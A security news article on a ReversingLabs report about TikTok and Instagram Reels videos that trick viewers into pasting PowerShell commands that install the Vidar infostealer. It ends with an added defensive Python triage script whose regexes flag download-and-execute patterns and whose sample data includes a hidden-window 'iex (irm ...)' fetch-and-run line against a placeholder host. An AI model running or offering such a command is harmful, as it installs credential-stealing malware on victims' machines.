- TikTok and Instagram Reels are now used to target victims
- “Free” subscriptions to Spotify, Microsoft and Adobe targeting cash-strapped users
- Social engineering remains the main vector, but basic account security measures do the heavy lifting
A new report from ReversingLabs warns doomscrollers about videos spreading on short-form platforms like TikTok and Instagram Reels, infecting users with password-stealing malware.
The videos usually promise free access to subscriptions like Spotify Premium, Windows, Office and Adobe – an instant, tell-tale sign that things may not be what they seem.
Instead of receiving phishing emails, victims are asked to open command line tools like PowerShell, then paste and run the command shown in the video.
Beware of this information-stealing malware
When they run the command, it triggers the download and installation of malware on the victim’s computer. Vidar, the information stealer, targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files and documents, and other sensitive information.
More importantly, the campaign marks a significant change. Previously, email phishing campaigns were extremely popular for accessing victims’ credentials, with just a click of a link leading to potential disaster. This newer method relies on victims physically entering commands into a tool, which requires more patience.
Ultimately, the attack exploits current economic tensions and the fact that consumers are looking for cheap and free alternatives to popular subscriptions.
“This type of social engineering is an easy way for malicious actors to divert social media traffic to a malicious website controlled by the attacker,” the researchers wrote.
Regardless, the overall theme is that social engineering remains the clearest way for attackers to reach their victims, and that’s good news because there are many basic principles that potential victims can follow, such as using multi-factor authentication to secure accounts.
Being wary of suspiciously cheap or free products/services and only downloading software from official providers would also help in this case.
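For defenders, the paste-and-run step described above leaves a trace in process-creation logs. The triage script below is an added example, not code from the ReversingLabs report or this article; the record fields, indicator patterns and sample events are assumptions, since the article does not show the actual command.

```python
import re

# Assumed heuristics: the article does not show the real command, so these are
# generic signs of "fetch something from the network and run it" in PowerShell.
FETCH = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXEC = re.compile(r"\b(invoke-expression|iex)\b|\|\s*(powershell|pwsh)\b", re.I)
HIDE = re.compile(r"(?<![\w-])-(w|win|windowstyle)\s+h(idden)?\b|"
                  r"(?<![\w-])-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}
# Parents suggesting a person typed or pasted the command (Run dialog, terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one process-creation record (a dict)."""
    if basename(event["image"]) not in SHELLS:
        return 0, []
    cmd, reasons = event["command_line"], []
    if FETCH.search(cmd):
        reasons.append("network fetch")
    if EXEC.search(cmd):
        reasons.append("executes fetched content")
    if HIDE.search(cmd):
        reasons.append("hidden window or encoded command")
    # Parent process only adds weight when the command line is already suspicious.
    if reasons and basename(event["parent_image"]) in INTERACTIVE_PARENTS:
        reasons.append("launched interactively")
    return len(reasons), reasons

def triage(events, threshold=3):
    """Return (host, user, reasons) for every event scoring >= threshold."""
    return [(e["host"], e["user"], r) for e in events
            for s, r in [score_event(e)] if s >= threshold]

PS5 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records, not from the report; example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"host": "PC-01", "user": "alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS5,
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/activate)"'},
    {"host": "PC-02", "user": "bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS5, "command_line": r"powershell Get-ChildItem C:\Users\bob\Documents"},
    {"host": "SRV-01", "user": "svc_patch", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": r"pwsh -File C:\ops\update.ps1"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags only the PC-01 record; the interactive listing and the scheduled script stay below the threshold.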